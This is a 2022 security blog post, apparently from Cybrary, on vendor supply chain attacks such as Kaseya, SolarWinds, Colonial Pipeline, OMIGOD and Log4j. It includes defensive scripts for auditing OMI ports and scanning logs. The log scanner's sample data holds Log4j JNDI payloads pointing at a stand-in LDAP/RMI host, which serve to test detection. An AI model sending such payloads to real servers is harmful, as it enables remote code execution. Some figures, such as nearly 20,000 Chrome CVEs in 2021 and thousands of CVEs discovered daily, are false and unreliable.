By: Owen Dubiel
May 6, 2022
Welcome to the Era of Vendor Supply Chain Pipeline Attacks
*Common Vulnerabilities and Exposures (CVE) is an industry standard for tagging and identifying vulnerabilities in the wild. In this article, we will cover some of the most devastating CVEs from the past year, focusing on a new trend among threat actors: targeting the vendor supply chain.*
An attack vector that has ramped up over the past year is the vendor supply chain pipeline: the IT and security software solutions used across the globe by companies of all sizes. Threat actors take advantage of vulnerabilities left in these vendor suites to expose a mighty gap and gain a direct way into some of the most secure networks on the planet.
The defensive landscape has become heavily reliant on security and IT solutions to protect and triage large networks. As you will see, this has left a significant hole in the exterior defense: actors compromise these vendors' solutions by injecting themselves into the development pipeline and swapping legitimate code for their malicious code. The following are some of the most critical supply chain attacks that occurred over this past year.
Popular Supply Chain Attacks:
Kaseya is an IT software management company that fell to the threat actor REvil in 2021. REvil exploited an authentication bypass vulnerability in the Kaseya VSA software interface. This vulnerability allowed REvil to bypass standard authentication, upload a payload, and execute a SQL injection. Ultimately, REvil was able to alter the software update and deploy its ransomware to hundreds of Kaseya customers using the solution. The effects were dramatic, causing over 1,000 businesses to close temporarily after their critical information was encrypted by the attack.
In 2020, FireEye dubbed its discovery of the SolarWinds supply chain attack Sunburst; it was later assigned CVE-2020-14005 and CVE-2020-13169. The effects of this discovery bled well into 2021. The attackers compromised the SolarWinds patch management engine and slipped their nefarious code into the SolarWinds Orion solution. This took the cyber world by storm. At first, no one could identify who was responsible for the breach. Later in the year, credit was given to the nation-state threat group NOBELIUM.
The Colonial Pipeline breach was one of the largest thus far in US history. The threat group DarkSide gained access to Colonial's VPN by compromising a single account that was marked as inactive. Once inside, the group could move about virtually undetected and deploy its ransomware at will. It is believed the account credentials were discovered online, potentially because a former employee had reused the same password elsewhere.
The OMIGOD vulnerability was assigned CVE-2021-38647; it left thousands of Azure Linux VMs open to remote code execution. The flaw was so widespread because it sat in the default OMI agent that Azure pushes out to Linux VMs, which underpins many Azure components such as automation, updates, and even the Operations Management Suite. CVE-2021-38647 was exploited by an unauthenticated remote user sending specially crafted packets to the Azure remote management ports (5986, 5985, and 1270), which gave the attacker the ability to execute code remotely with ease. Since its discovery, additional spinoff CVEs have provided the same level of remote execution capability, achieved slightly differently: CVE-2021-38645, CVE-2021-38648, and CVE-2021-38649.
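Because the OMI flaws above were reached over the management ports the article names, a quick defensive check is to confirm those ports are not listening on any address beyond loopback. The following script is an added illustration, not Cybrary's or Microsoft's code; it parses a constructed sample of `ss -ltn` output and reports any OMI port bound to a routable address (the real fix remains patching the OMI agent).

```python
"""Audit a Linux VM's listening sockets for OMI management ports that are
exposed beyond loopback. Added illustration; the `ss -ltn` output below is
constructed, not captured from a real host."""

# Ports the article names as the OMI remote-management listeners.
OMI_PORTS = {5985, 5986, 1270}

# Constructed sample of `ss -ltn` output (listening TCP sockets, numeric).
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       128     127.0.0.1:5985       0.0.0.0:*
LISTEN  0       128     *:5986               *:*
LISTEN  0       128     [::]:1270            [::]:*
LISTEN  0       4096    127.0.0.1:631        0.0.0.0:*
"""

# Addresses that are only reachable from the VM itself.
LOOPBACK = {"127.0.0.1", "::1", "[::1]"}


def parse_listeners(ss_output):
    """Yield (local_address, port) for each LISTEN row of `ss -ltn` output."""
    for line in ss_output.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")  # handles [::]:1270 too
        if port.isdigit():
            yield addr, int(port)


def exposed_omi_ports(ss_output):
    """Return {port: address} for OMI ports bound to a non-loopback address.

    Anything returned here is reachable from the network, i.e. the surface
    CVE-2021-38647 was exploited through, and should be patched and firewalled.
    """
    return {port: addr for addr, port in parse_listeners(ss_output)
            if port in OMI_PORTS and addr not in LOOPBACK}


if __name__ == "__main__":
    for port, addr in sorted(exposed_omi_ports(SAMPLE_SS_OUTPUT).items()):
        print(f"OMI port {port} is listening on {addr}: restrict or patch")
```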
I'm sure everyone is familiar with this one: the infamous Log4j. Tracked as CVE-2021-44228, the flaw allows remote attackers to execute arbitrary code fetched from an LDAP server when message lookup substitution is enabled. Apache Log4j is a common and widely used solution, so when this was discovered, there was widespread panic to disable the service to avoid imminent compromise. Since then, multiple spinoff vulnerabilities have derived from the affected versions (2.0-2.17). This is not the first time Apache has been the culprit behind nationwide breaches, but in the past it was due to lazy patching efforts, not weekend zero-day drops.
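The lookup substitution described above shows up in logs as a `${jndi:...}` string in whatever field an attacker can get logged, often a request header. As an added illustration (not the article's or Apache's code), the script below runs that detection over constructed access-log lines, URL-decoding each line first because the lookup frequently arrives percent-encoded, and returns the source IP and JNDI scheme for each hit.

```python
"""Scan web access logs for Log4j message-lookup strings of the form
${jndi:...}, the trigger for CVE-2021-44228. Added illustration; the log
lines below are constructed and use documentation IP space."""
import re
from urllib.parse import unquote

# Match a JNDI lookup and capture its scheme (ldap, rmi, dns, ...).
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)", re.IGNORECASE)

# Constructed combined-format log lines: line 2 carries a plain lookup in the
# User-Agent, line 3 a percent-encoded one, lines 1 and 4 are benign (line 4
# contains a non-JNDI lookup and must not be flagged).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.7:1389/a}"
10.0.0.9 - - [10/Dec/2021:10:01:09 +0000] "GET /api HTTP/1.1" 404 0 "-" "%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%2Fx%7D"
10.0.0.12 - - [10/Dec/2021:10:02:00 +0000] "POST /search?q=%24%7Bdate%3AMM%7D HTTP/1.1" 200 1 "-" "curl/7.79"
"""


def find_jndi_lookups(log_text):
    """Return a list of (source_ip, scheme) for every line with a JNDI lookup.

    Each line is URL-decoded before matching so that encoded payloads in a
    query string or header are caught as well as plain ones.
    """
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        match = JNDI_RE.search(unquote(line))
        if match:
            source_ip = line.split(" ", 1)[0]
            hits.append((source_ip, match.group(1).lower()))
    return hits


if __name__ == "__main__":
    for ip, scheme in find_jndi_lookups(SAMPLE_LOG):
        print(f"JNDI lookup ({scheme}) from {ip}: check Log4j patch level")
```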
To conclude our list of critical CVEs, it may be no surprise that Google Chrome takes the cake. Chrome reported almost 20,000 CVEs in 2021, with over 2,700 of them rated critical. To view a complete list of these CVEs, visit here. One of the most significant supply chain concerns with Google Chrome was that not only were corporations affected; everyone who uses the Chrome browser was exposed for days, and in some cases weeks, while waiting for a patch to come out. The scariest part is that most end users are not aware they may have to perform manual updates themselves, which leaves millions of insecure and vulnerable Chrome browsers open to attack at any given moment. The result is a mad rush for enterprises to test new patches and deploy them as soon as possible, as new vulnerabilities are released weekly, if not daily.
At the end of the day, what do all these vulnerabilities have in common? Supply chain attacks have added complexity to the security conversation and left end users helpless, sitting and waiting for a patch to be released. These vulnerabilities are detrimental to both organizations and individuals, as the responsibility is now shared between the vendor and the end user. It is no longer just the end user's responsibility to update their services; vendors now have the big task of taking a more proactive role in security. With the shift to cloud-based solutions, the vendor's responsibility to ensure that both the end user and the supply chain are adequately secured is more pressing than ever. It will be interesting to see what technologies emerge from this trend to help eliminate or offset the effects of supply chain attacks.
Thousands of CVEs are discovered daily. If you want hands-on practice exploiting and mitigating these CVEs, explore Cybrary’s CVE Series here. These courses let you experience critical vulnerabilities through interactive courses and secure virtual environments to develop the skills necessary to mitigate risk.